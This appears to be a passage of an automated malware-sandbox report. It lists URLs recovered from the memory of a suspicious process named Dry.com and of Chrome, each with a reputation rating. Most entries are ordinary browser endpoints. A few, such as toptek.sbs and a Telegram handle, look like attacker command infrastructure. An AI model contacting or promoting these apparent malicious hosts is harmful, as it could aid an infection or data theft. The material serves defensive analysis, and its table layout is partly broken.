                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.dr | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/; | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://issuetracker.google.com/284462263 | chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/9 | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | 9EI7wrGs4K.exe | false | | high
                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_ | 9EI7wrGs4K.exe | false | | high
                https://publickeyservice.gcp.privacysandboxservices.com | chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                http://polymer.github.io/AUTHORS.txt | chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://docs.google.com/ | chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://publickeyservice.pa.aws.privacysandboxservices.com | chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://anglebug.com/7714 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/R | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://photos.google.com?referrer=CHROME_NTP | chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.google.com/chrome/tips/ | chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anglebug.com/6248 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://ogs.google.com/widget/callout?eom=1 | chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anglebug.com/6929 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anglebug.com/5281 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://toptek.sbses | Dry.com, 0000000A.00000002.2461862261.000000000413C000.00000040.00001000.00020000.00000000.sdmp | false | | unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.dr | false | | high
                https://issuetracker.google.com/255411748 | chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://anglebug.com/7246 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://anglebug.com/7369 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://anglebug.com/7489 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/?q= | chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore | chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://drive-daily-2.corp.google.com/ | chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://polymer.github.io/PATENTS.txt | chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview | chrome.exe, 0000000F.00000003.2074915631.0000335C02A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.dr | false | | high
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.dr | false | | high
                https://t.me/k04aelm0nk3Mozilla/5.0 | Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.autoitscript.com/autoit3/X | Dry.com, 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp, Dry.com.1.dr, Volunteer.0.dr | false | | high
                                                                                                        https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drfalse
                                                                                                            high
                                                                                                            https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icochrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anglebug.com/3078chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://anglebug.com/7553chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://anglebug.com/5375chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://anglebug.com/5371chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/4722chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2023113077.0000335C001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drfalse
                                                                                                                                    high
                                                                                                                                    https://toptek.sbsosh;Dry.com, 0000000A.00000002.2461862261.000000000400C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FB9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/6692chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/3502chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://anglebug.com/3623chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://anglebug.com/3625chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/3624chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://t.mDry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://anglebug.com/5007chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3862chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000003.2044447862.0000335C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2052211296.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033004820.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032887424.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037451733.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034342009.0000335C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/4836chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://issuetracker.google.com/issues/166475273chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icochrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/4384chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.google.com/chrome/tips/gs3chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/3970chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://apis.google.comchrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allDry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://labs.google.com/search?source=ntpchrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://anglebug.com/7604chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/7761chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/hkchrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/7760chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgDry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drfalse
high
URL | Malicious | Reputation | Source (process, memory dump)
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | false | high | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp; EKXT2N.10.dr
http://anglebug.com/5901 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/3965 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/6439 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/7406 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
https://www.google.com/search | false | high | chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmp
https://anglebug.com/7161 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
